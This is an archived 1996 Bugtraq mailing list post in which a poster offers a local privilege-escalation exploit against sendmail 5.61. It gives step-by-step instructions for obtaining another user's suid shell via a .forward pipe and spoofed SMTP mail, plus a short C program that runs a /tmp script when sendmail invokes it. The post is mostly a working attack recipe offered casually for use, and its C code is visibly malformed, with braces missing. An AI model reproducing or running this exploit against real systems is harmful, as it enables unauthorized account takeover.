Bugtraq mailing list archives
Re: Exploiting Zolaris 2.4 ?? :)
From: fletch () MODEX COM (Fletch)
Date: Sun, 4 Aug 1996 18:23:20 -0400
has anyone had any luck with this proggie??
Fuckin sendmail 5.61 -
#define MYUID to be your uid at the top of the program. make a file /tmp/x,
which is a script to make a suid shell compile the prog, call it say
/tmp/yo put in your .forward file:
"|/tmp/yo"F
now connect 2 the smtp port, and send urself mail FROM whomever you want
the shell as (anyone except root). Wait a bit (maybe up 2 an hour - depends
how often the sendmail runs un the queue). Type mailq every so often (or
/usr/lib/sendmail -bq). You will see your entry in the queue, before its
flushed. It usually works, but sometimes it doesn't - you just gotta keep
your fingers crossed!
#define MYUID 123 /* change this!! */
#include <sys/param.h>
#include <sys/types.h>
#include <stdio.h>
#include <sysexits.h>
#include <pwd.h>
#include <grp.h>
#define OURFILE "/tmp/x"
main()
int myuid, rval;
if ((myuid = getuid()) == MYUID)
rval = EX_TEMPFAIL;
else {
rval = EX_OK;
system(OURFILE);
}
exit(rval);
}
Peace out.
+-------------+ "Fletch"
| ||||| | <Fletch () modex com>
| (x x) | Http://www.modex.com/~fletch
--+oOOO-(_)-OOOo+-------------------------------
Current thread:
- Re: Exploiting Zolaris 2.4 ?? :) Leif Hedstrom (Aug 04)
- <Possible follow-ups>
- Re: Exploiting Zolaris 2.4 ?? :) Fletch (Aug 04)
- Re: your mail Greg Woods (Aug 05)
- Re: your mail neill (Aug 05)
- PAM login programs? Josh Wilmes (Aug 05)
- procmail DANIEL .D .EZEKIEL (Aug 05)
- (Fwd) CERT Advisory CA-96.17 - Vulnerability in Solaris vold Hubert Feyrer (Aug 06)
- Re: procmail Adam Shostack (Aug 06)
- Re: procmail Jon Lewis (Aug 06)
- Re: procmail Neil Soveran-Charley (Aug 06)
- Re: procmail James Wang (Aug 06)
- Re: procmail Kari E. Hurtta (Aug 06)
- Re: your mail Greg Woods (Aug 05)